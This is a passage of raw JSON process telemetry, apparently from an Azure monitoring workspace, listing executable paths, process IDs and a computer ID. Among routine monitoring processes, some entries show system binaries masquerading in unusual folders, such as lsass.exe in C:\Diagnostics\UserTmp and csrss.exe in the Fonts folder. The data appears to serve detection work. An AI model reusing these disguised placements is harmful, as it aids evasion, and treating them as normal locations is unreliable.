Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\"],\"ProcessId\":[\"0x888\",\"0x1610\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xb10\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x570\",\"0x280\",\"0x888\",\"0x888\",\"0x1490\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1630\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1094\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xc08\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x13fc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x11b0\",\"0x280\",\"0x888\",\"0x888\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1728\",\"0xbc8\",\"0xbc8\",\"0x176c\",\"0xbc8\",\"0xbc8\",\"0x17cc\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x888\",\"0x690\",\"0x280\",\"0x888\",\"0x280\",\"0x440\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x2a8\",\"0xbc8\",\"0xfc0\",\"0x77c\",\"0x132c\",\"0xbc8\",\"0x132c\",\"0x230\",\"0x280\",\"0xbc8\",\"0xbc8\",\"0xc18\",\"0xbc8\",\"0x1274\",\"0xbc8\",\"0x230\",\"0xd10\",\"0xbc8\",\"0x103c\",\"0xbc8\",\"0xbb4\",\"0xbc8\",\"0x123c\",\"0x154c\",\"0xbc8\",\"0x1580\",\"0xbc8\",\"0x15b4\",\"0xbc8\",\"0x15e8\",\"0xbc8\",\"0x161c\",\"0xbc8\",\"0x1650\",\"0xbc8\",\"0x1684\",\"0xbc8\",\"0x16b8\",\"0xbc8\",\"0x16ec\",\"0xbc8\",\"0xa08\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x140c\",\"0x240\",\"0x1250\",\"0x142c\",\"0xbc8\",\"0x14ac\",\"0xbc8\",\"0x230\",\"0x280\",\"0x888\",\"0x14e0\",\"0xbc8\",\"0x1514\",\"0xbc8\",\"0xbc8\",\"0x1490\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x14fc\",\"0xbc8\",\"0x14e8\",\"0xbc8\",\"0x1520\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1660\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1550\",\"0xbc8\",\"0x158c\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x16c0\",\"0x1704\",\"0x888\",\"0x11cc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x138c\",\"0x280\",\"0x888\",\"0x888\",\"0x280\",\"0xbc8\",\"0x16f4\",\"0x1770\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x440\",\"0x888\",\"0xbc8\",\"0x1724\",\"0xbc8\",\"0x1758\",\"0xbc8\",\"0x178c\",\"0x17ac\",\"0x230\",\"0x17ac\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1434\",\"0xbc8\",\"0xbc8\",\"0x888\",\"0x888\",\"0x690\",\"0x280\",\"0x888\",\"0x888\",\"0x13e4\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x57c\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xb8\",\"0x280\",\"0x440\",\"0x888\",\"0xa40\",\"0x690\",\"0x888\",\"0x888\",\"0x888\",\"0x138c\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xa08\",\"0x280\",\"0x888\",\"0x888\",\"0x440\",\"0x888\",\"0x107c\",\"0x280\",\"0x888\",\"0x440\",\"0x888\",\"0x888\",\"0x123c\",\"0x440\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x364\",\"0x280\",\"0x888\",\"0x888\",\"0x17fc\",\"0x280\",\"0x888\",\"0x888\",\"0x440\",\"0x888\",\"0x11e8\",\"0x280\",\"0x888\",\"0x888\",\"0xfbc\",\"0x280\",\"0x888\",\"0x690\",\"0x1388\",\"0x888\",\"0x888\",\"0x894\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x1c4\",\"0x280\",\"0x888\",\"0x888\",\"0x1550\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1050\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x10e0\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xd64\",\"0x280\",\"0x888\",\"0x888\",\"0x280\",\"0x888\",\"0xd64\",\"0x280\",\"0x888\",\"0x888\",\"0x28c\",\"0x888\",\"0x888\",\"0xbe8\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x10fc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xa84\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x280\",\"0x888\",\"0xc08\",\"0x280\",\"0x888\"],\"SourceComputerId\":[\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d9